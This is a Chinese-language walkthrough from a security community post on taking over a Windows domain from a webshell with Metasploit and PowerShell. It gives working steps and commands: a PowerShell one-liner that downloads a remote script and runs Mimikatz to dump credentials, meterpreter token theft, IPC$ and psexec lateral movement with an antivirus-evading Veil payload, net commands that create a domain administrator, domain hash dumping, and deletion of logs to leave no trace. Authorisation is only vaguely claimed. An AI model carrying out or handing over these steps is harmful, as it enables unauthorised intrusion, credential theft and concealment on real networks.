Metasploit域滲透測試全程實錄(終結篇)

作者:shuteer

來源:i春秋社區

前言

內網滲透測試資料基本上都是很多大牛的文章告訴我們思路如何,但是對於我等小菜一直是雲里霧裡。於是使用什麼樣的工具才內網才能暢通無阻,成了大家一直以來的渴求。今天小菜我本著所有師傅們無私分享的精神,特將三年內求師傅,求妹子,求神器所得,經過整理後,關鍵的知識點寫出來。相關知識點總結如下:

  • 免殺payload的生成,請使用Veil
  • msf在meterpreter下的提權嘗試
  • msf在meterpreter下的bypassuac嘗試
  • 內網滲透測試過程中的信息關聯
  • meterpreter的路由添加以及相關掃描
  • Powershell在meterpreter下面的使用
  • Meterpreter的post模塊使用
  • Msf的custom自己生成的payload的使用
  • 進程注入竊取令牌

其實重點不在於知識的多少,大家只需關注比較重點的連接點。分享為了方便大家以後一起交流,一起學習,一起進步。首先shell是別人給我的,也不是這裡介紹的重點,所以在此忽略。

滲透測試的環境詳細如下:

A 堡壘機(webshell所在機器):windows server 2012

B 堡壘機:windows 2008(powershell掃描機器)

C 堡壘機:有域管理進程的機器windows server 2012

D 堡壘機若干

第八步 Poershell獲取域控管理員在線的機器

內網滲透測試不得不說到兩大神器:msf和powershell,但是看大家基本上都是分開來使用的,或者說大家在一次滲透測試的過程中很少遇到,今天作為讀者的你有福了。

首先來講講powershell的在內網滲透測試中不僅能掃,能爆,能轉發,當然還能做更多的事情,一般使用到的模塊有下面三個:

1 Empire據說是神器,也確實是神器,我沒使用過,暫時不多說

2 PowerUp 據說提權神器,也確實是神器,我很少使用。也暫時不多說

3 PowerView 據說是域滲透神器,也確實是神器,我一直用,非常漂亮

來說說powershell的使用,其實也很簡單,只是大家在用的過程中一般沒有太多的注意,主要有三種方式來調用:

1 當然是下載到本地執行,詳細使用方法如後面連接:powershell "IEX (New-Object

Net.WebClient).DownloadString(is.gd/oeoFuI); Invoke-Mimikatz

-DumpCreds"

2 第二種方式是把powershell文件上傳到堡壘機本地執行, powershell.exe -exec

bypass -Command "& {Import-Module .powerview.ps1;

Invoke-UserHunter}"

3 上傳到對方本地,然後Import-Module導入,使用。

PowerView的所有模塊使用其實很簡單,直接調用方法,大家看看下面的圖就知道了。如果你能看到這裡開始你的powershell之旅,內網將開始變得簡單。

廢話講了這麼多,下面開始我們的實戰,其實很簡單,我真的想說很簡單,簡單到一句話搞定。Powerview中的Invoke-UserHunter是獲取當前域管理員在線登錄的機器。這次的旅程我們就用它來完成進一步的信息獲取。詳細如下圖:

第九步 域控管理員許可權的獲取(windows2012許可權)

在經過第八步之後,身為讀者的你是不是感覺這次收穫有一點點,內網域滲透測試再也不是那麼一籌莫展了呢。神器過後還是神器,又見它windows server 2012,雖然域管理在線,但是我們的抓密碼神器陽痿了,總不能修改註冊表,等管理員再次登錄吧。

目前來看看我們遇到的問題,通過powershell成功獲取到相關的域控管理員在線的一台機器windows server 2012,並且用這台機器的許可權,那麼接下來我們去搞定域控。思路如下:

1 修改註冊表等待域控管理員再次登錄來抓取(黃花菜都會涼的)

2 通過PowerUp的進程來注入獲取域許可權(沒使用過暫時放棄),當然此處也可以寫類似外掛的功能注入進程獲取許可權

3 msf的令牌竊取功能(這個可以很容易實現)

知道思路,那麼接下來就開始我們愉快的旅程吧。我要求師傅,求妹子,求神器,專業求到域控去:

1 同樣使用ipc經典入侵手法,反彈meterpreter,

Getsysttem 許可權

Ps 查看域管理所在的進程

Migrate pid注入進程

2 繼續經典的IPC$到域控

Meterpreter下面shell

Net use 域控ipc$

Net time 域控ip

Copy bat.bat 域控ipc$

At 域控ip time c:bat.bat(意料之外的錯誤,提示schtasks.exe,不熟)

3 通往成功的路不只有一條,添加域管賬戶

Net user demo demo /ad /domain

Net group 「domain admins」 demo /ad /domain

到了此刻,我們已經擁有域管許可權了。詳細的截圖如下:

圖9-1 注入域管進程,連接域控

圖9-2 添加域管理賬號

圖9-3 查看域管理是否成功

第十步 域控我來了(msf p**ec反彈shell)

一看時間,凌晨七點了,早上的太陽要升起來了。此時此刻你的心情是怎麼樣呢。該晨起跑步了吧。東方的太陽就要升起了,域控的許可權也終於到了了。

先將思路,登錄域控其實有很多方式的,下面我說一下我能知道的幾種吧,相信大

家也大家也都知道的:

1 埠轉發或者socks登錄域控遠程桌面

2 登錄對方內網的一台電腦使用p**ec來反彈shell

3 使用msf的p**ec反彈meterpreter

反彈需要注意要用到的知識,我們這裡採用的是pse**c來反彈meterpreter,其中涉及到的知識如下:

1 msf中p**ec模塊的使用

2 cuestom模塊的使用,配合meterpreter,在payload不免殺的情況下如何使用自己Veil生成的payload

詳細的使用過程如下圖:

圖10-1 p**ec執行測試

圖10-2 p**ec默認反彈不成功

圖10-3 meterpreter的https模塊反彈成功

圖10-4 域控的系統信息

第十一步 Meterpreter獲取所有用戶的hash

有了域的許可權之後,如果我們還想進行深層次的控制,那麼dumphash是必不可少的。首先來看看我們需要的知識:

1 msf有兩個模塊可以使用,一個是hashdump,此模塊只能導出本地的hash,大家測試就可以知道了,另外一個是smart_hashdump,此模塊可以用來導出域用戶的hash.

2 powershell有可以直接導出的模塊,大家自行嘗試一下

3 wce,mimikatz等神器的使用

在這裡我採用的是msf的smart_hashdump的模塊。在此需要注意的是要想使使用此模塊導出hash,必須要使用system的許可權才行。詳細的過程如下圖:

圖11-1 smart_hashdump模塊的使用

第十二步 曲折的探索之路

這裡是整理一下之前用到的一些技術,和走過的一些彎路。文檔到這差不多算是完成了一個從webshell到域控的探索之路算是完成了,當然在這裡我把過程中走的一些彎路還有不足點指出來,歡迎大家的指正,共同學習。

圖12-1 session控制圖

根據上面的圖知道,我現在控制的Session一共有5個,其中有四個是必須要獲取的,分別為session1,session2

session4,session5。其中session1為webshell反彈所獲得,第二個session2是信息分析獲取到的,,session4為獲取域管理員所獲取,session5為域。其中session3就是我所走過的彎路,浪費了時間。之後我們必須為了更好更快速有效的完成滲透測試,平時努力練劍。儘力做到不出劍則已,出劍則見血。

第十三步 我輕輕的來了,我又輕輕的走了,管理員,再見(清理)

作為一次比較成功的友情測試,我們必須要做到來無影,去無蹤。所以收尾工作,也將悄悄展開。涉及到相關的知識點:

1 刪除之前添加的域管理賬號

2 刪除所有的使用過程中的工具

3 刪除自己所有的操作記錄

4 關閉所有的meterpreter

在此過程中我們一共上傳了兩個文件,一個bar.bat,一個64位的mimikatz抓密碼工具,直接刪除即可。

圖13-1 刪除用戶

圖13-2 關閉所有的session

總結

總結說點什麼好呢。還是先喊口號吧------「求妹子,求師傅,求神器」。感謝三年多以來為我默默分享的師傅們,感謝妹子在我做這次友情測試的時候,她一直靜靜的陪在我這邊,感謝這些年求來的各種神器,沒有這些資源的支持,我將不會完成這次的友情測試。作為一名滲透測試愛好者,我們一直在努力的追求著心中那個美麗的夢想;作為一名程序員,我們就是想簡單的coding。人生如此美好,大家何不聯手,一起分享美好。

彩蛋——Metasploit系列前篇:Metasploit滲透某高校域伺服器


推薦閱讀:

如何利用Windows Defender ATP檢測反射型DLL載入
利用API NtQueryInformationThread和I_QueryTagInformation實現對Windows日誌監控的繞過
國內研究人員發現GMR-2漏洞,可實時解密衛星電話通訊
Appleby 被黑,世界級財富大鱷財務信息泄露
銀行木馬Retefe變種通過「永恆之藍」漏洞感染多國銀行網站

TAG:渗透测试 | 信息安全 | 黑客Hacker |